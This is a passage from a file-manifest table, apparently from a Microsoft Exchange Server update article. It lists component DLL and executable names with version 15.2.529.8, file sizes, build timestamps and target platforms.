\nMicrosoft.exchange.mailboxreplicationservice.calendarsyncprovider.dll| 15.2.529.8| 175,480| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.common.dll| 15.2.529.8| 2,791,808| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.complianceprovider.dll| 15.2.529.8| 53,112| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.contactsyncprovider.dll| 15.2.529.8| 151,928| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.dll| 15.2.529.8| 966,520| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.easprovider.dll| 15.2.529.8| 185,424| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.eventlog.dll| 15.2.529.8| 31,616| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.mailboxreplicationservice.googledocprovider.dll| 15.2.529.8| 39,800| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.imapprovider.dll| 15.2.529.8| 105,848| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.mapiprovider.dll| 15.2.529.8| 95,312| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.popprovider.dll| 15.2.529.8| 43,392| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyclient.dll| 15.2.529.8| 18,808| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.proxyservice.dll| 15.2.529.8| 172,928| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.pstprovider.dll| 15.2.529.8| 102,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.remoteprovider.dll| 15.2.529.8| 98,920| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.storageprovider.dll| 15.2.529.8| 188,800| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.syncprovider.dll| 15.2.529.8| 43,384| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxreplicationservice.xml.dll| 15.2.529.8| 447,352| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxreplicationservice.xrmprovider.dll| 15.2.529.8| 90,184| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransport.monitoring.dll| 15.2.529.8| 107,904| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransport.storedriveragents.dll| 15.2.529.8| 374,656| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransport.storedrivercommon.dll| 15.2.529.8| 193,920| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.2.529.8| 552,312| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.2.529.8| 16,248| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.2.529.8| 321,400| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.2.529.8| 18,000| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.2.529.8| 45,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.2.529.8| 18,296| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.2.529.8| 12,672| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.2.529.8| 21,072| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.2.529.8| 415,096| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.2.529.8| 1,269,840| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.2.529.8| 39,288| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.2.529.8| 433,232| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.2.529.8| 4,563,320| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.2.529.8| 261,192| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.2.529.8| 33,664| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.2.529.8| 94,080| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.management.deployment.dll| 15.2.529.8| 586,104| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.2.529.8| 3,537,488| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.2.529.8| 67,960| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.dll| 15.2.529.8| 16,485,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.2.529.8| 58,744| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.2.529.8| 23,928| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.2.529.8| 101,760| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.migration.dll| 15.2.529.8| 543,608| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.mobility.dll| 15.2.529.8| 305,016| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.2.529.8| 273,992| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.2.529.8| 418,920| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.2.529.8| 275,832| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.2.529.8| 70,520| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.2.529.8| 7,873,104| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.management.recipient.dll| 15.2.529.8| 1,501,560| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.snapin.esm.dll| 15.2.529.8| 71,544| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.2.529.8| 1,238,904| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.management.transport.dll| 15.2.529.8| 1,877,584| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.managementgui.dll| 15.2.529.8| 5,366,856| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.managementmsg.dll| 15.2.529.8| 36,216| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.2.529.8| 117,624| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.2.529.8| 207,952| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.2.529.8| 79,944| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.2.529.8| 17,272| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.2.529.8| 156,232| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.2.529.8| 65,912| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.2.529.8| 30,584| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.2.529.8| 58,448| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.2.529.8| 29,768| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.2.529.8| 175,696| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.2.529.8| 28,544| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.2.529.8| 75,128| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.2.529.8| 207,232| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.2.529.8| 440,192| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.2.529.8| 83,328| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.2.529.8| 35,200| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.2.529.8| 53,112| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.2.529.8| 96,632| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.migration.dll| 15.2.529.8| 1,110,120| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.2.529.8| 14,720| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.mobiledriver.dll| 15.2.529.8| 135,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.2.529.8| 5,065,592| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.2.529.8| 20,048| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.2.529.8| 68,480| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.net.dll| 15.2.529.8| 5,086,080| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.2.529.8| 265,592| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.networksettings.dll| 15.2.529.8| 37,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.2.529.8| 549,760| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.2.529.8| 22,912| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.2.529.8| 106,368| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.oauth.core.dll| 15.2.529.8| 291,920| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.2.529.8| 17,280| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.2.529.8| 277,888| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.odata.dll| 15.2.529.8| 2,993,528| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.2.529.8| 90,496| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.2.529.8| 101,752| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.2.529.8| 38,264| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.2.529.8| 45,432| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.2.529.8| 58,240| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.2.529.8| 147,536| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.2.529.8| 26,496| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.2.529.8| 184,192| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.2.529.8| 26,496| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.2.529.8| 38,272| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.2.529.8| 55,680| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.2.529.8| 147,536| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.2.529.8| 191,872| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.2.529.8| 33,664| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.partitioncache.dll| 15.2.529.8| 28,032| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.2.529.8| 32,640| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.2.529.8| 15,224| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.2.529.8| 17,280| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.2.529.8| 17,280| 01-Jan-2020| 11:22| Not applicable \nMicrosoft.exchange.pop3.exe| 15.2.529.8| 106,872| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.2.529.8| 106,872| 01-Jan-2020| 11:23| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.2.529.8| 25,160| 01-Jan-2020| 11:23| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.2.529.8| 25,160| 01-Jan-2020| 11:23| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.2.529.8| 42,880| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.2.529.8| 264,568| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.2.529.8| 264,568| 01-Jan-2020| 11:21| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.2.529.8| 358,264| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.2.529.8| 4,164,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.2.529.8| 308,600| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.2.529.8| 41,568| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.2.529.8| 30,584| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.2.529.8| 137,088| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.2.529.8| 441,928| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.2.529.8| 14,432| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.2.529.8| 224,848| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.2.529.8| 106,064| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.pst.dll| 15.2.529.8| 169,040| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.2.529.8| 169,040| 01-Jan-2020| 11:19| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.2.529.8| 259,664| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.publicfolders.dll| 15.2.529.8| 72,056| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.2.529.8| 215,928| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.2.529.8| 106,872| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.2.529.8| 425,848| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.2.529.8| 70,528| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.query.analysis.dll| 15.2.529.8| 46,672| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.query.configuration.dll| 15.2.529.8| 215,936| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.query.core.dll| 15.2.529.8| 168,312| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.query.ranking.dll| 15.2.529.8| 343,424| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.2.529.8| 174,456| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.2.529.8| 95,312| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.2.529.8| 127,560| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.relevance.core.dll| 15.2.529.8| 63,568| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.relevance.data.dll| 15.2.529.8| 36,936| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.2.529.8| 17,992| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.relevance.people.dll| 15.2.529.8| 9,666,944| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.2.529.8| 20,788,088| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.2.529.8| 36,728| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.2.529.8| 97,872| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.2.529.8| 28,536| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.2.529.8| 72,264| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.routing.client.dll| 15.2.529.8| 15,736| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.routing.server.exe| 15.2.529.8| 59,472| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.rpc.dll| 15.2.529.8| 1,647,200| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.2.529.8| 207,232| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.2.529.8| 60,512| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.2.529.8| 518,016| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.2.529.8| 161,144| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.2.529.8| 724,344| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.2.529.8| 234,872| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.2.529.8| 21,064| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.2.529.8| 35,408| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.2.529.8| 42,568| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.2.529.8| 56,184| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.2.529.8| 27,512| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.rules.common.dll| 15.2.529.8| 130,432| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.2.529.8| 14,712| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.2.529.8| 20,560| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.safehtml.dll| 15.2.529.8| 21,368| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.2.529.8| 267,648| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.2.529.8| 110,968| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.2.529.8| 112,720| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.2.529.8| 622,672| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.2.529.8| 185,440| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.2.529.8| 12,152| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.2.529.8| 19,536| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.core.dll| 15.2.529.8| 212,040| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.2.529.8| 17,992| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.engine.dll| 15.2.529.8| 97,872| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.2.529.8| 16,976| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.fast.dll| 15.2.529.8| 436,608| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.files.dll| 15.2.529.8| 274,304| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.search.flighting.dll| 15.2.529.8| 24,952| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.search.mdb.dll| 15.2.529.8| 217,976| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.search.service.exe| 15.2.529.8| 26,496| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.2.529.8| 221,056| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.security.dll| 15.2.529.8| 1,558,632| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.529.8| 19,832| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.529.8| 28,544| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.529.8| 225,376| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.529.8| 5,150,288| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.529.8| 214,912| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.529.8| 115,576| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.529.8| 83,024| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.529.8| 80,760| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.529.8| 66,432| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.529.8| 81,488| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.529.8| 212,040| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.529.8| 1,340,800| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.529.8| 511,872| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.529.8| 47,688| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.529.8| 873,544| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.529.8| 1,352,056| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.529.8| 30,584| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.529.8| 130,424| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.529.8| 1,018,752| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.529.8| 111,480| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.529.8| 34,680| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.529.8| 19,320| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.529.8| 14,944| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.529.8| 60,792| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.529.8| 50,768| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.529.8| 14,208| 01-Jan-2020| 11:19| x64 \nMicrosoft.exchange.services.common.dll| 15.2.529.8| 74,104| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.services.dll| 15.2.529.8| 8,494,152| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.529.8| 30,072| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.529.8| 633,728| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.529.8| 1,651,280| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.services.json.dll| 15.2.529.8| 296,520| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.529.8| 43,384| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.529.8| 233,336| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.529.8| 178,552| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.529.8| 348,536| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.529.8| 56,696| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.529.8| 93,056| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.529.8| 296,312| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.529.8| 35,704| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.529.8| 27,216| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.529.8| 114,784| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.529.8| 53,624| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.529.8| 75,128| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.529.8| 142,720| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.529.8| 24,960| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.529.8| 15,232| 01-Jan-2020| 11:23| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.529.8| 58,744| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.529.8| 27,000| 01-Jan-2020| 11:21| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.529.8| 47,184| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.sqm.dll| 15.2.529.8| 46,968| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.store.service.exe| 15.2.529.8| 28,232| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.529.8| 26,488| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.529.8| 13,904| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.529.8| 31,608| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.529.8| 1,205,112| 01-Jan-2020| 11:20| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.529.8| 158,800| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.529.8| 628,096| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.529.8| 13,176| 01-Jan-2020| 11:22| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.529.8| 16,248| 01-Jan-2020| 11:22| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.529.8| 13,392| 01-Jan-2020| 11:20| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.529.8| 221,776| 01-Jan-2020| 11:19| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.529.8| 13,696| 01-Jan-2020| 11:21| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.529.8| 29,256| 01-Jan-2020| 